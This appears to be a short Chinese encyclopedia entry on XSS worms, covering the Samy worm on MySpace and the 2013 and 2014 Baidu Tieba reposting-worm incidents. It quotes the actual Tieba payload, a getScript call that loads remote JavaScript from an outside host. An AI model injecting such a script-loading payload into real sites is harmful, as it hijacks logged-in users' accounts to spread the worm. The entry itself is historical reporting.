XSS蠕虫

历史第一个XSS蠕虫是针对网站Myspace的Samy，它在20小时内感染了100万个账户，作者Samy Kamkar之后被起诉

见对新浪微博的争议#XSS.E6.BC.8F.E6.B4.9E

2013年5月19日， 百度贴吧转帖功能再度出现xss漏洞，大量贴吧内充斥接近满版面， 包含代码getScript（'//xss.retaker.me/1.js'）为标题的帖子，当已登陆用户打开这样的帖子，用户所持账户便以相同方式在多个贴吧转帖原作者的帖，部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染^{[1] [2] [3]}

2014年3月9日， 百度贴吧转帖功能再度出现xss漏洞

由于XSS蠕虫基于浏览器而不是操作系统，取决于其依赖网站的规模，它可以在短时间内达到对巨大数量的计算机感染

1. ^ 百度贴吧XSS蠕虫大量爬行. [2013-05-19]. （原始内容存档于2020-08-11）. 
2. ^ 谷歌搜索
3. ^ 新浪微博, "xss贴吧". [2013-05-19]. （原始内容存档于2019-02-07）.